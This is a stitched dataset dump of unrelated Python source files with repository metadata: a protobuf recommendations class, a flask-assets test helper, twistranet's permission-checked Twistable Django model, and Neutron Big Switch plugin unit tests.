{kwa.key: json.loads(kwa.value) for kwa in self.proto.db.kwarg} if len(self.proto.db.label_encoder.encoding) > 0: self.label_encoder = deserialise_encoder( self.proto.db.label_encoder) self.db_kwargs['label_encoder'] = self.label_encoder else: self.label_encoder = None self._set_default() @classmethod def deserialise(cls, proto: bytes, json: bool=False) -> 'Recommendations': """Deserialises a protobuf into Recommendations. Parameters ---------- proto Serialised protobuf. json Whether the serialised protobuf is in JSON format. Returns ------- Recommendations """ if not json: recommendations = acton_pb.Recommendations() recommendations.ParseFromString(proto) return cls(recommendations) return cls(json_format.Parse(proto, acton_pb.Recommendations())) @property def DB(self) -> acton.database.Database: """Gets a database context manager for the specified database. Returns ------- type Database context manager. """ if hasattr(self, '_DB'): return self._DB self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name]( self.proto.db.path, **self.db_kwargs) return self._DB @property def recommendations(self) -> List[int]: """Gets a list of recommended IDs. Returns ------- List[int] List of recommended IDs. """ if hasattr(self, '_recommendations'): return self._recommendations self._recommendations = list(self.proto.recommended_id) return self._recommendations @property def labelled_ids(self) -> List[int]: """Gets a list of labelled IDs. Returns ------- List[int] List of labelled IDs. """ if hasattr(self, '_labelled_ids'): return self._labelled_ids self._labelled_ids = list(self.proto.labelled_id) return self._labelled_ids def _validate_proto(self): """Checks that the protobuf is valid and enforces constraints. Raises ------ ValueError """ validate_db(self.proto.db) def _set_default(self): """Adds default parameters to the protobuf.""" @classmethod def make( cls: type, recommended_ids: Iterable[int], labelled_ids: Iterable[int], recommender: str, db: acton.database.Database) -> 'Recommendations': """Constructs a Recommendations. Parameters ---------- recommended_ids Iterable of recommended instance IDs. labelled_ids Iterable of labelled instance IDs used to make recommendations. recommender Name of the recommender used to make recommendations. db Database. Returns ------- Recommendations """ proto = acton_pb.Recommendations() # Store single data first. proto.recommender = recommender # Store the IDs. for id_ in recommended_ids: proto.recommended_id.append(id_) for id_ in labelled_ids: proto.labelled_id.append(id_) # Store the database. proto.db.CopyFrom(db.to_proto()) return cls(proto)
bsd-3-clause
-1,972,909,586,038,859,800
27.202401
79
0.562827
false
4.518274
false
false
false
miracle2k/flask-assets
tests/helpers.py
1
1105
from flask.app import Flask from webassets.test import TempEnvironmentHelper as BaseTempEnvironmentHelper from flask_assets import Environment try: from flask import Blueprint Module = None except ImportError: # Blueprints only available starting with 0.7, # fall back to old Modules otherwise. Blueprint = None from flask import Module __all__ = ('TempEnvironmentHelper', 'Module', 'Blueprint') class TempEnvironmentHelper(BaseTempEnvironmentHelper): def _create_environment(self, **kwargs): if not hasattr(self, 'app'): self.app = Flask(__name__, static_folder=self.tempdir, **kwargs) self.env = Environment(self.app) return self.env try: from test.test_support import check_warnings except ImportError: # Python < 2.6 import contextlib @contextlib.contextmanager def check_warnings(*filters, **kwargs): # We cannot reasonably support this, we'd have to copy to much code. # (or write our own). Since this is only testing warnings output, # we might slide by ignoring it. yield
bsd-2-clause
1,334,822,051,698,322,400
28.078947
77
0.694118
false
4.316406
false
false
false
numericube/twistranet
twistranet/twistapp/models/twistable.py
1
31887
""" Base of the securable (ie. directly accessible through the web), translatable and full-featured TN object. A twist-able object in TN is an object which can be accessed safely from a view. Normally, everything a view manipulates must be taken from a TN object. Content, Accounts, MenuItems, ... are all Twistable objects. This abstract class provides a lot of little tricks to handle view/model articulation, such as the slug management, prepares translation management and so on. """ import re import inspect import logging import traceback from django.db import models from django.db.models import Q, loading from django.db.utils import DatabaseError from django.contrib.auth.models import User from django.core.exceptions import ValidationError, PermissionDenied, ObjectDoesNotExist from django.utils.safestring import mark_safe from twistranet.twistapp.lib.log import log from twistranet.twistapp.lib import roles, permissions from twistranet.twistapp.lib.slugify import slugify from twistranet.twistapp.signals import twistable_post_save from fields import ResourceField, PermissionField, TwistableSlugField class TwistableManager(models.Manager): """ It's the base of the security model!! """ # Disabled for performance reasons. # use_for_related_fields = True def get_query_set(self, __account__ = None, request = None, ): """ Return a queryset of 100%-authorized objects. All (should) have the can_list perm to True. This is in fact a kind of 'has_permission(can_list)' method! This method IS very slow. But you can speed things up if you pass either 'request' or '__account__' along the lines. Be aware, however, that in this case you loose the 'safety belt' provided by the security model. """ # Check for anonymous query import community, account, community __account__ = self._getAuthenticatedAccount(__account__, request) base_query_set = super(TwistableManager, self).get_query_set() # System account: return all objects without asking any question. And with all permissions set. if __account__.id == account.SystemAccount.SYSTEMACCOUNT_ID: return base_query_set # XXX TODO: Make a special query for admin members? Or at least mgrs of the global community? # XXX Make this more efficient? # XXX Or, better, check if current user is manager of the owner ? if __account__.id > 0: managed_accounts = [__account__.id, ] else: managed_accounts = [] # XXX This try/except is there so that things don't get stucked during boostrap try: if __account__.is_admin: return base_query_set.filter( _p_can_list__lte = roles.manager, ) except DatabaseError: log.warning("DB error while checking AdminCommunity. This is NORMAL during syncdb or bootstrap.") return base_query_set # Regular check. Works for anonymous as well... # network_ids = __account__.network_ids if not __account__.is_anonymous: qs = base_query_set.filter( Q( owner__id = __account__.id, _p_can_list = roles.owner, ) | Q( _access_network__targeted_network__target = __account__, _p_can_list = roles.network, ) | Q( _access_network__targeted_network__target = __account__, _p_can_list = roles.public, ) | Q( # Anonymous stuff _access_network__isnull = True, _p_can_list = roles.public, ) ) else: # Anon query. Easy: We just return public stuff. # Warning: nested query is surely inefficient... free_access_network = Twistable.objects.__booster__.filter( _access_network__isnull = True, _p_can_list = roles.public, ) qs = base_query_set.filter( Q( # Strictly anonymous stuff _access_network__isnull = True, _p_can_list = roles.public, ) | Q( # Incidently anonymous stuff (public stuff published by an anon account) _access_network__isnull = False, _access_network__id__in = free_access_network, _p_can_list = roles.public, ) ) return qs def getCurrentAccount(self, request): """ The official and hassle-free method of getting the currently auth account from a view. Just pass the request object. """ from account import Account, AnonymousAccount, UserAccount u = getattr(request, 'user', None) if isinstance(u, User): # We use this instead of the get_profile() method to avoid an infinite recursion here. # We mimic the _profile_cache behavior of django/contrib/auth/models.py to avoid doing a lot of requests on the same object if not hasattr(u, '_account_cache'): u._account_cache = UserAccount.objects.__booster__.get(user__id__exact = u.id) u._account_cache.user = u return u._account_cache # Didn't find anything. We must be anonymous. return AnonymousAccount() def _getAuthenticatedAccount(self, __account__ = None, request = None): """ Dig the stack to find the authenticated account object. Return either a (possibly generic) account object or None. Views with a "request" parameter magically works with that. If you want to use a system account, declare a '__account__' variable in your caller function. """ from account import Account, AnonymousAccount, UserAccount # If we have the __account__ object, then it's quite obvious here... if isinstance(__account__, Account): return __account__ # If we have the request object, then we just can use getCurrentAccount() instead if request: return self.getCurrentAccount(request) # We dig into the stack frame to find the request object. frame = inspect.currentframe() try: while frame: frame_members = dict(inspect.getmembers(frame)) # Inspect 'locals' variables to get the request or __account__ _locals = frame_members.get('f_locals', None) if _locals: # Check for an __acount__ variable holding a generic Account object. It always has precedence over 'request' if _locals.has_key('__account__') and isinstance(_locals['__account__'], Account): return _locals['__account__'] # Check for a request.user User object if _locals.has_key('request'): u = getattr(_locals['request'], 'user', None) if isinstance(u, User): # We use this instead of the get_profile() method to avoid an infinite recursion here. # We mimic the _profile_cache behavior of django/contrib/auth/models.py to avoid doing a lot of requests on the same object if not hasattr(u, '_account_cache'): u._account_cache = UserAccount.objects.__booster__.get(user__id__exact = u.id) u._account_cache.user = u return u._account_cache # Get back to the upper frame frame = frame_members.get('f_back', None) # Didn't find anything. We must be anonymous. return AnonymousAccount() finally: # Avoid circular refs frame = None stack = None del _locals # Backdoor for performance purposes. Use it at your own risk as it breaks security. @property def __booster__(self): return super(TwistableManager, self).get_query_set() @property def can_create(self,): auth = self._getAuthenticatedAccount() return not auth.is_anonymous class _AbstractTwistable(models.Model): """ We use this abstract class to enforce use of our manager in all our subclasses. """ objects = TwistableManager() class Meta: abstract = True class Twistable(_AbstractTwistable): """ Base (an abstract) type for rich, inheritable and securable TN objects. This class is quite optimal when using its base methods but you should always use your dereferenced class when you can do so! All Content and Account classes derive from this. XXX TODO: Securise the base manager! """ # Object management. Slug is optional (id is not ;)) slug = TwistableSlugField(unique = True, db_index = True, null = True, blank = True) # This is a way to de-reference the underlying model rapidly app_label = models.CharField(max_length = 64, db_index = True) model_name = models.CharField(max_length = 64, db_index = True) # Text representation of this content # Usually a twistable is represented that way: # (pict) TITLE # Description [Read more] # Basic metadata shared by all Twist objects. # Title is mandatory! title = models.CharField(max_length = 255, blank = True, default = '') description = models.TextField(max_length = 1024, blank = True, default = '') created_at = models.DateTimeField(auto_now_add = True, null = True, db_index = False) modified_at = models.DateTimeField(auto_now = True, null = True, db_index = True) created_by = models.ForeignKey("Account", related_name = "created_twistables", db_index = True, ) modified_by = models.ForeignKey("Account", null = True, related_name = "modified_twistables", db_index = True, ) # Picture management. # If None, will use the default_picture_resource_slug attribute. # If you want to get the account picture, use the 'picture' attribute. default_picture_resource_slug = None # XXX TODO PJ : the widget params are never rendered picture = ResourceField( media_type='image', null = True, blank = True, related_name = "picture_of") tags = models.ManyToManyField("Tag", related_name = "tagged") # These are two security flags. # The account this content is published for. 'NULL' means visible to AnonymousAccount. publisher = models.ForeignKey("Account", null = True, blank = True, related_name = "published_twistables", db_index = True, ) # Security / Role shortcuts. These are the ppl/account the Owner / Network are given to. # The account this object belongs to (ie. the actual author) owner = models.ForeignKey("Account", related_name = "by", db_index = True, ) # Our security model. permission_templates = () # Define this in your subclasses permissions = PermissionField(db_index = True) _access_network = models.ForeignKey("Account", null = True, blank = True, related_name = "+", db_index = True, ) # Scoring information. This is stored directly on the object for performance reasons. # Should be updated by BATCH, not necessarily 'live' (for perf reasons as well). static_score = models.IntegerField(default = 0) # The permissions. It's strongly forbidden to edit those roles by hand, use the 'permissions' property instead. _p_can_view = models.IntegerField(default = 16, db_index = True) _p_can_edit = models.IntegerField(default = 16, db_index = True) _p_can_list = models.IntegerField(default = 16, db_index = True) _p_can_list_members = models.IntegerField(default = 16, db_index = True) _p_can_publish = models.IntegerField(default = 16, db_index = True) _p_can_join = models.IntegerField(default = 16, db_index = True) _p_can_leave = models.IntegerField(default = 16, db_index = True) _p_can_create = models.IntegerField(default = 16, db_index = True) # Other configuration stuff (class-wise) _ALLOW_NO_PUBLISHER = False # Prohibit creation of an object of this class with publisher = None. _FORCE_SLUG_CREATION = True # Force creation of a slug if it doesn't exist @property def kind(self): """ Return the kind of object it is (as a lower-cased string). """ from twistranet.twistapp.models import Content, Account, Community, Resource from twistranet.tagging.models import Tag mc = self.model_class if issubclass(mc, Content): return 'content' elif issubclass(mc, Community): return 'community' elif issubclass(mc, Account): return 'account' elif issubclass(mc, Resource): return 'resource' elif issubclass(mc, Tag): return 'tag' raise NotImplementedError("Can't get twistable category for object %s" % self) @models.permalink def get_absolute_url(self): """ return object absolute_url """ category = self.kind viewbyslug = '%s_by_slug' % category viewbyid = '%s_by_id' % category if hasattr(self, 'slug'): if self.slug: return (viewbyslug, [self.slug]) return (viewbyid, [self.id]) @property def html_link(self,): """ Return a pretty HTML anchor tag """ d = { 'label': self.title_or_description, 'url': self.get_absolute_url(), } return u"""<a href="%(url)s" title="%(label)s">%(label)s</a>""" % d @property def forced_picture(self,): """ Return actual picture for this content or default picture if not available. May return None! XXX SHOULD CACHE THIS """ import resource if issubclass(self.model_class, resource.Resource): return self.object try: picture = self.picture if picture is None: raise resource.Resource.DoesNotExist() except resource.Resource.DoesNotExist: try: picture = resource.Resource.objects.get(slug = self.model_class.default_picture_resource_slug) except resource.Resource.DoesNotExist: return None return picture def get_thumbnail(self, *args, **kw): """ Same arguments as sorl's get_thumbnail method. """ from sorl.thumbnail import default try: return default.backend.get_thumbnail(self.forced_picture.image, *args, **kw) except: # in rare situations (CMJK + PNG mode, sorl thumbnail raise an error) import resource picture = resource.Resource.objects.get(slug = self.model_class.default_picture_resource_slug) return default.backend.get_thumbnail(picture.image, *args, **kw) @property def thumbnails(self,): """ Return a dict of standard thumbnails methods. XXX TODO: Cache this! And use lazy resolution! Some day resources will be able to have several DIFFERENT previews... Preview: Max = 500x500; Used when a large version should be available. Summary: Max = 100x100; Summary Preview: Max = Min = 100x100; Medium: Max = Min = 50x50; Icon: Max = Min = 16x16; """ return { "preview": self.get_thumbnail("500x500", crop = "", upscale = False), "summary": self.get_thumbnail("100x100", crop = "", upscale = False), "summary_preview": self.get_thumbnail("100x100", crop = "center top", upscale = True), "medium": self.get_thumbnail("50x50", crop = "center top", upscale = True), "big_icon": self.get_thumbnail("32x32", upscale = False), "icon": self.get_thumbnail("16x16", crop = "center top", upscale = True), } # # # Internal management, ensuring DB consistancy # # # def save(self, *args, **kw): """ Set various object attributes """ import account import community auth = Twistable.objects._getAuthenticatedAccount() # Check if we're saving a real object and not a generic Content one (which is prohibited). # This must be a programming error, then. if self.__class__.__name__ == Twistable.__name__: raise ValidationError("You cannot save a raw content object. Use a derived class instead.") # Set information used to retreive the actual subobject self.model_name = self._meta.object_name self.app_label = self._meta.app_label # Set owner, publisher upon object creation. Publisher is NEVER set as None by default. if self.id is None: # If self.owner is already set, ensure it's done by SystemAccount if self.owner_id: if not isinstance(auth, account.SystemAccount): raise PermissionDenied("You're not allowed to set the content owner by yourself.") else: self.owner = self.getDefaultOwner() if not self.publisher_id: self.publisher = self.getDefaultPublisher() else: if not self.publisher.can_publish: raise PermissionDenied("You're not allowed to publish on %s" % self.publisher) else: # XXX TODO: Check that nobody sets /unsets the owner or the publisher of an object # raise PermissionDenied("You're not allowed to set the content owner by yourself.") if not self.can_edit: raise PermissionDenied("You're not allowed to edit this content.") # Set created_by and modified_by fields if self.id is None: self.created_by = auth self.modified_by = auth # Check if publisher is set. Only GlobalCommunity may have its publisher to None to make a site visible on the internet. if not self.publisher_id: if not self.__class__._ALLOW_NO_PUBLISHER: raise ValueError("Only the Global Community can have no publisher, not %s" % self) # Set permissions; we will apply them last to ensure we have an id. # We also ensure that the right permissions are set on the right object if not self.permissions: perm_template = self.model_class.permission_templates if not perm_template: raise ValueError("permission_templates not defined on class %s" % self.__class__.__name__) self.permissions = perm_template.get_default() tpl = [ t for t in self.permission_templates.permissions() if t["id"] == self.permissions ] if not tpl: # Didn't find? We restore default setting. XXX Should log/alert something here! tpl = [ t for t in self.permission_templates.permissions() if t["id"] == self.model_class.permission_templates.get_default() ] log.warning("Restoring default permissions. Problem here.") log.warning("Unable to find %s permission template %s in %s" % (self, self.permissions, self.permission_templates.perm_dict)) if tpl[0].get("disabled_for_community") and issubclass(self.publisher.model_class, community.Community): raise ValueError("Invalid permission setting %s for this object (%s/%s)" % (tpl, self, self.title_or_description)) elif tpl[0].get("disabled_for_useraccount") and issubclass(self.publisher.model_class, account.UserAccount): raise ValueError("Invalid permission setting %s for this object (%s/%s)" % (tpl, self, self.title_or_description)) for perm, role in tpl[0].items(): if perm.startswith("can_"): if callable(role): role = role(self) setattr(self, "_p_%s" % perm, role) # Check if we're creating or not created = not self.id # Generate slug (or not !) if not self.slug and self.__class__._FORCE_SLUG_CREATION: if self.title: self.slug = slugify(self.title) elif self.description: self.slug = slugify(self.description) else: self.slug = slugify(self.model_name) self.slug = self.slug[:40] if created and self.__class__._FORCE_SLUG_CREATION: while Twistable.objects.__booster__.filter(slug = self.slug).exists(): match = re.search("_(?P<num>[0-9]+)$", self.slug) if match: root = self.slug[:match.start()] num = int(match.groupdict()['num']) + 1 else: root = self.slug num = 1 self.slug = "%s_%i" % (root, num, ) # Perform a full_clean on the model just to be sure it validates correctly self.full_clean() # Save and update access network information ret = super(Twistable, self).save(*args, **kw) self._update_access_network() # Send TN's post-save signal twistable_post_save.send(sender = self.__class__, instance = self, created = created) return ret def _update_access_network(self, ): """ Update hierarchy of driven objects. If save is False, won't save result (useful when save() is performed later). """ # No id => this twistable doesn't control anything, we pass. Value will be set AFTER saving. import account, community if not self.id: raise ValueError("Can't set _access_network before saving the object.") # Update current object. We save current access and determine the more restrictive _p_can_list access permission. # Remember that a published content has its permissions determined by its publisher's can_VIEW permission! _current_access_network = self._access_network obj = self.object if issubclass(obj.model_class, account.Account): _p_can_list = self._p_can_list else: _p_can_list = max(self._p_can_list, self.publisher and self.publisher._p_can_view or roles.public) # If restricted to content owner, no access network mentionned here. if _p_can_list in (roles.owner, ): self._access_network = None # XXX We have to double check this, esp. on the GlobalCommunity object. # Network role: same as current network for an account, same as publisher's network for a content elif _p_can_list == roles.network: if issubclass(obj.model_class, account.Account): self._access_network = obj else: self._access_network = self.publisher # Public content (or so it seems) elif _p_can_list == roles.public: # GlobalCommunity special case: if can_list goes public, then we can unrestrict the _access_network if issubclass(self.model_class, community.GlobalCommunity): self._access_network = None # Let's go public! else: # Regular treatment obj = obj.publisher while obj: if obj._p_can_list == roles.public: if obj == obj.publisher: # If an object is its own publisher (eg. GlobalCommunity), # we avoid infinite recursions here. break obj = obj.publisher elif obj._p_can_list in (roles.owner, roles.network, ): self._access_network = obj break else: raise ValueError("Unexpected can_list role found: %d on object %s" % (obj._p_can_list, obj)) else: raise ValueError("Unexpected can_list role found: %d on object %s" % (obj._p_can_list, obj)) # Update this object itself without calling the save() method again Twistable.objects.__booster__.filter(id = self.id).update(_access_network = self._access_network) # Update dependant objects if current object's network changed for public role Twistable.objects.__booster__.filter( Q(_access_network__id = self.id) | Q(publisher = self.id), _p_can_list = roles.public, ).exclude(id = self.id).update(_access_network = obj) # This is an additional check to ensure that no _access_network = None object with _p_can_list|_p_can_view = public still remains # glob = community.GlobalCommunity.get() # Twistable.objects.__booster__.filter( # _access_network__isnull = True, # _p_can_list = roles.public # ).update(_access_network = glob) def delete(self,): """ Here we avoid deleting related object for nullabled ForeignKeys. XXX This is bad 'cause if we use the Manager.delete() method, this won't get checked!!! XXX We need to migrate to Django 1.3 ASAP to get this issue solved with the on_delete attribute. Hack from http://djangosnippets.org/snippets/1231/ """ self.clear_nullable_related() super(Twistable, self).delete() def clear_nullable_related(self): """ Recursively clears any nullable foreign key fields on related objects. Django is hard-wired for cascading deletes, which is very dangerous for us. This simulates ON DELETE SET NULL behavior manually. """ # Update picture__id Twistable.objects.__booster__.filter(picture__id = self.id).update( picture = None ) @property def model_class(self): """ Return the actual model's class. This method issues no DB query. """ return loading.get_model(self.app_label, self.model_name) @property def object(self): """ Return the exact subclass this object belongs to. IT MAY ISSUE DB QUERY, so you should always consider using model_class instead if you can. This is quite complex actually: since we want like to minimize database overhead, we can't allow a "Model.objects.get(id = x)" call. So, instead, we walk through object inheritance to fetch the right attributes. XXX TODO: This is where I can implement the can_view or can_list filter. See search results to understand why. """ if self.id is None: raise RuntimeError("You can't get subclass until your object is saved in database.") # Get model class directly model = loading.get_model(self.app_label, self.model_name) if isinstance(self, model): return self return model.objects.__booster__.get(id = self.id) def __unicode__(self,): """ Return model_name: id (slug) """ if not self.app_label or not self.model_name: return "Unsaved %s" % self.__class__ if not self.id: return "Unsaved %s.%s" % (self.app_label, self.model_name, ) if self.slug: return "%s.%s: %s (%i)" % (self.app_label, self.model_name, self.slug, self.id) else: return "%s.%s: %i" % (self.app_label, self.model_name, self.id) @property def title_or_description(self): """ Return either title or description (or slug) but avoid the empty string at all means. The return value is considered HTML-safe. """ for attr in ('title', 'description', 'slug', 'id'): v = getattr(self, attr, None) if not v: continue if attr=='id': v = str(v) if not isinstance(v, unicode): v = unicode(v, errors = 'ignore') # important : to display description # we always use wiki filter which apply a "mark_safe" # but after a special treatment if attr!='description': return mark_safe(v) return v class Meta: app_label = 'twistapp' # # # Security Management # # # # XXX TODO: Use a more generic approach? And some caching as well? # # XXX Also, must check that permissions are valid for the given obj # # # def getDefaultOwner(self,): """ General case: owner is the auth account (or SystemAccount if not found?) """ return Twistable.objects._getAuthenticatedAccount() def getDefaultPublisher(self,): """ General case: publisher is the auth account (or SystemAccount if not found?) """ return Twistable.objects._getAuthenticatedAccount() @property def can_view(self): if not self.id: return True # Can always view an unsaved object auth = Twistable.objects._getAuthenticatedAccount() return auth.has_permission(permissions.can_view, self) @property def can_delete(self): if not self.id: return True # Can always delete an unsaved object auth = Twistable.objects._getAuthenticatedAccount() return auth.has_permission(permissions.can_delete, self) @property def can_edit(self): if not self.id: return True # Can always edit an unsaved object auth = Twistable.objects._getAuthenticatedAccount() return auth.has_permission(permissions.can_edit, self) @property def can_publish(self): """ True if authenticated account can publish on the current account object """ if not self.id: return False # Can NEVER publish an unsaved object auth = Twistable.objects._getAuthenticatedAccount() return auth.has_permission(permissions.can_publish, self) @property def can_list(self): """ Return true if the current account can list the current object. """ if not self.id: return True # Can always list an unsaved object auth = Twistable.objects._getAuthenticatedAccount() return auth.has_permission(permissions.can_list, self) # # # Views relations # # # @property def summary_view(self): return self.model_class.type_summary_view @property def detail_view(self): return self.model_class.type_detail_view
agpl-3.0
8,492,852,835,539,124,000
43.911268
151
0.581365
false
4.452248
false
false
false
beagles/neutron_hacking
neutron/tests/unit/bigswitch/test_restproxy_plugin.py
1
13331
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2012 Big Switch Networks, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. from contextlib import nested import mock from oslo.config import cfg import webob.exc from neutron import context from neutron.extensions import portbindings from neutron.manager import NeutronManager from neutron.tests.unit import _test_extension_portbindings as test_bindings from neutron.tests.unit.bigswitch import fake_server from neutron.tests.unit.bigswitch import test_base from neutron.tests.unit import test_api_v2 import neutron.tests.unit.test_db_plugin as test_plugin import neutron.tests.unit.test_extension_allowedaddresspairs as test_addr_pair patch = mock.patch class BigSwitchProxyPluginV2TestCase(test_base.BigSwitchTestBase, test_plugin.NeutronDbPluginV2TestCase): def setUp(self, plugin_name=None): self.setup_config_files() self.setup_patches() if plugin_name: self._plugin_name = plugin_name super(BigSwitchProxyPluginV2TestCase, self).setUp(self._plugin_name) self.port_create_status = 'BUILD' class TestBigSwitchProxyBasicGet(test_plugin.TestBasicGet, BigSwitchProxyPluginV2TestCase): pass class TestBigSwitchProxyV2HTTPResponse(test_plugin.TestV2HTTPResponse, BigSwitchProxyPluginV2TestCase): def test_failover_memory(self): # first request causes failover so next shouldn't hit bad server with self.network() as net: kwargs = {'tenant_id': 'ExceptOnBadServer'} with self.network(**kwargs) as net: req = self.new_show_request('networks', net['network']['id']) res = req.get_response(self.api) self.assertEqual(res.status_int, 200) class TestBigSwitchProxyPortsV2(test_plugin.TestPortsV2, BigSwitchProxyPluginV2TestCase, test_bindings.PortBindingsTestCase): VIF_TYPE = portbindings.VIF_TYPE_OVS HAS_PORT_FILTER = False def test_update_port_status_build(self): with self.port() as port: self.assertEqual(port['port']['status'], 'BUILD') self.assertEqual(self.port_create_status, 'BUILD') def _get_ports(self, netid): return self.deserialize('json', self._list_ports('json', netid=netid))['ports'] def test_rollback_for_port_create(self): plugin = NeutronManager.get_plugin() with self.subnet() as s: self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() kwargs = {'device_id': 'somedevid'} # allow thread spawns for this patch self.spawn_p.stop() with self.port(subnet=s, **kwargs): self.spawn_p.start() plugin.evpool.waitall() self.httpPatch.stop() ports = self._get_ports(s['subnet']['network_id']) #failure to create should result in port in error state self.assertEqual(ports[0]['status'], 'ERROR') def test_rollback_for_port_update(self): with self.network() as n: with self.port(network_id=n['network']['id'], device_id='66') as port: port = self._get_ports(n['network']['id'])[0] data = {'port': {'name': 'aNewName', 'device_id': '99'}} self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() self.new_update_request('ports', data, port['id']).get_response(self.api) self.httpPatch.stop() uport = self._get_ports(n['network']['id'])[0] # name should have stayed the same self.assertEqual(port['name'], uport['name']) def test_rollback_for_port_delete(self): with self.network() as n: with self.port(network_id=n['network']['id'], device_id='somedevid') as port: self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() self._delete('ports', port['port']['id'], expected_code= webob.exc.HTTPInternalServerError.code) self.httpPatch.stop() port = self._get_ports(n['network']['id'])[0] self.assertEqual('BUILD', port['status']) def test_correct_shared_net_tenant_id(self): # tenant_id in port requests should match network tenant_id instead # of port tenant_id def rest_port_op(self, ten_id, netid, port): if ten_id != 'SHARED': raise Exception('expecting tenant_id SHARED. got %s' % ten_id) with self.network(tenant_id='SHARED', shared=True) as net: with self.subnet(network=net) as sub: pref = 'neutron.plugins.bigswitch.servermanager.ServerPool.%s' tomock = [pref % 'rest_create_port', pref % 'rest_update_port', pref % 'rest_delete_port'] patches = [patch(f, create=True, new=rest_port_op) for f in tomock] for restp in patches: restp.start() with self.port(subnet=sub, tenant_id='port-owner') as port: data = {'port': {'binding:host_id': 'someotherhost', 'device_id': 'override_dev'}} req = self.new_update_request('ports', data, port['port']['id']) res = req.get_response(self.api) self.assertEqual(res.status_int, 200) def test_create404_triggers_sync(self): # allow async port thread for this patch self.spawn_p.stop() with nested( self.subnet(), patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock404), patch(test_base.RESTPROXY_PKG_PATH + '.NeutronRestProxyV2._send_all_data') ) as (s, mock_http, mock_send_all): with self.port(subnet=s, device_id='somedevid') as p: # wait for the async port thread to finish plugin = NeutronManager.get_plugin() plugin.evpool.waitall() call = mock.call( send_routers=True, send_ports=True, send_floating_ips=True, triggered_by_tenant=p['port']['tenant_id'] ) mock_send_all.assert_has_calls([call]) self.spawn_p.start() class TestBigSwitchProxyPortsV2IVS(test_plugin.TestPortsV2, BigSwitchProxyPluginV2TestCase, test_bindings.PortBindingsTestCase): VIF_TYPE = portbindings.VIF_TYPE_IVS HAS_PORT_FILTER = False def setUp(self): super(TestBigSwitchProxyPortsV2IVS, self).setUp() cfg.CONF.set_override('vif_type', 'ivs', 'NOVA') class TestNoHostIDVIFOverride(test_plugin.TestPortsV2, BigSwitchProxyPluginV2TestCase, test_bindings.PortBindingsTestCase): VIF_TYPE = portbindings.VIF_TYPE_OVS HAS_PORT_FILTER = False def setUp(self): super(TestNoHostIDVIFOverride, self).setUp() cfg.CONF.set_override('vif_type', 'ovs', 'NOVA') def test_port_vif_details(self): kwargs = {'name': 'name', 'device_id': 'override_dev'} with self.port(**kwargs) as port: self.assertEqual(port['port']['binding:vif_type'], portbindings.VIF_TYPE_OVS) class TestBigSwitchVIFOverride(test_plugin.TestPortsV2, BigSwitchProxyPluginV2TestCase, test_bindings.PortBindingsTestCase): VIF_TYPE = portbindings.VIF_TYPE_OVS HAS_PORT_FILTER = False def setUp(self): super(TestBigSwitchVIFOverride, self).setUp() cfg.CONF.set_override('vif_type', 'ovs', 'NOVA') def test_port_vif_details(self): kwargs = {'name': 'name', 'binding:host_id': 'ivshost', 'device_id': 'override_dev'} with self.port(**kwargs) as port: self.assertEqual(port['port']['binding:vif_type'], portbindings.VIF_TYPE_IVS) kwargs = {'name': 'name2', 'binding:host_id': 'someotherhost', 'device_id': 'other_dev'} with self.port(**kwargs) as port: self.assertEqual(port['port']['binding:vif_type'], self.VIF_TYPE) def test_port_move(self): kwargs = {'name': 'name', 'binding:host_id': 'ivshost', 'device_id': 'override_dev'} with self.port(**kwargs) as port: data = {'port': {'binding:host_id': 'someotherhost', 'device_id': 'override_dev'}} req = self.new_update_request('ports', data, port['port']['id']) res = self.deserialize(self.fmt, req.get_response(self.api)) self.assertEqual(res['port']['binding:vif_type'], self.VIF_TYPE) def _make_port(self, fmt, net_id, expected_res_status=None, arg_list=None, **kwargs): arg_list = arg_list or () arg_list += ('binding:host_id', ) res = self._create_port(fmt, net_id, expected_res_status, arg_list, **kwargs) # Things can go wrong - raise HTTP exc with res code only # so it can be caught by unit tests if res.status_int >= 400: raise webob.exc.HTTPClientError(code=res.status_int) return self.deserialize(fmt, res) class TestBigSwitchProxyNetworksV2(test_plugin.TestNetworksV2, BigSwitchProxyPluginV2TestCase): def _get_networks(self, tenant_id): ctx = context.Context('', tenant_id) return NeutronManager.get_plugin().get_networks(ctx) def test_rollback_on_network_create(self): tid = test_api_v2._uuid() kwargs = {'tenant_id': tid} self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() self._create_network('json', 'netname', True, **kwargs) self.httpPatch.stop() self.assertFalse(self._get_networks(tid)) def test_rollback_on_network_update(self): with self.network() as n: data = {'network': {'name': 'aNewName'}} self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() self.new_update_request('networks', data, n['network']['id']).get_response(self.api) self.httpPatch.stop() updatedn = self._get_networks(n['network']['tenant_id'])[0] # name should have stayed the same due to failure self.assertEqual(n['network']['name'], updatedn['name']) def test_rollback_on_network_delete(self): with self.network() as n: self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() self._delete('networks', n['network']['id'], expected_code=webob.exc.HTTPInternalServerError.code) self.httpPatch.stop() # network should still exist in db self.assertEqual(n['network']['id'], self._get_networks(n['network']['tenant_id'] )[0]['id']) class TestBigSwitchProxySubnetsV2(test_plugin.TestSubnetsV2, BigSwitchProxyPluginV2TestCase): pass class TestBigSwitchProxySync(BigSwitchProxyPluginV2TestCase): def test_send_data(self): plugin_obj = NeutronManager.get_plugin() result = plugin_obj._send_all_data() self.assertEqual(result[0], 200) class TestBigSwitchAddressPairs(BigSwitchProxyPluginV2TestCase, test_addr_pair.TestAllowedAddressPairs): pass
apache-2.0
-6,112,451,128,211,050,000
41.864952
79
0.57295
false
4.131081
true
false
false
rob-hills/Booktype
